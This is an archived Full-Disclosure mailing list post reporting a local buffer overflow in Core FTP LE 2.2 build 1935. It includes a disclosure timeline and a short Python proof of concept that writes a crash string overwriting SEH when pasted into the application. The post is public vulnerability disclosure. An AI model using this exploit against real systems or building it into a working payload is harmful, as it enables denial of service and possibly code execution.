lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 8 Sep 2019 11:44:27 +0600
From: Debashis Pal <debashis.pals@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Core FTP LE Version 2.2,
	build 1935 - Local Buffer Overflow (SEH Unicode)

#!/usr/bin/python

# Exploit Title:  Core FTP LE Version 2.2, build 1935 - Local Buffer
Overflow (SEH Unicode)
# Vulnerability Details: Core FTP LE Version 2.2, build 1935 is prone to a
buffer overflow vulnerability that may result in a DoS user local folder
selection pane
# Exploit Type  : DOS
# Date: 08-Sep-2019
# Vulnerable Software: Core FTP LE
# Version: Version 2.2, build 1935
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://www.coreftp.com/download/coreftplite.exe
# Tested Windows : Windows Vista Ultimate SP2(32-bit), Windows 7
Professional SP1(32-bit)
# Exploit Author: Debashis Pal

#Timeline
# Vulnerability Discover Date: 01-Sep-2019
# Vulnerability Report to Vendor:01-Sep-2019,No responds
# Again email to Vendor:05-Sep-2019 ,No responds
# Public Disclose : 08-Sep-2019

# PoC
# 1. coreftpleversion2-2build1935.txt from POC.py code, open in
notepad(coreftpleversion2-2build1935.txt), copy contents
# 2. Open Core FTP LE(Version 2.2, build 1935)
# 3. Select the left interface(CORE FTP LE,local folder selection pane)
# 4. paste contents from notepad
# 5. Application will crash and SEH overwritten with Unicode



crash =  "\x43"  * 585 #Junk
crash += "\x42"  * 2   #nSEH
crash += "\x41" *  2   #SEH
crash += "\x44"  * 411 #More Junk


file="coreftpleversion2-2build1935.txt"
generate=open(file, "w")
generate.write(crash)
generate.close

#Attachment: Application will crash and SEH overwritten with Unicode.jpg

Thank you,
Debashis Pal

Download attachment "Application will crash and SEH overwritten with Unicode.jpg" of type "image/jpeg" (346429 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists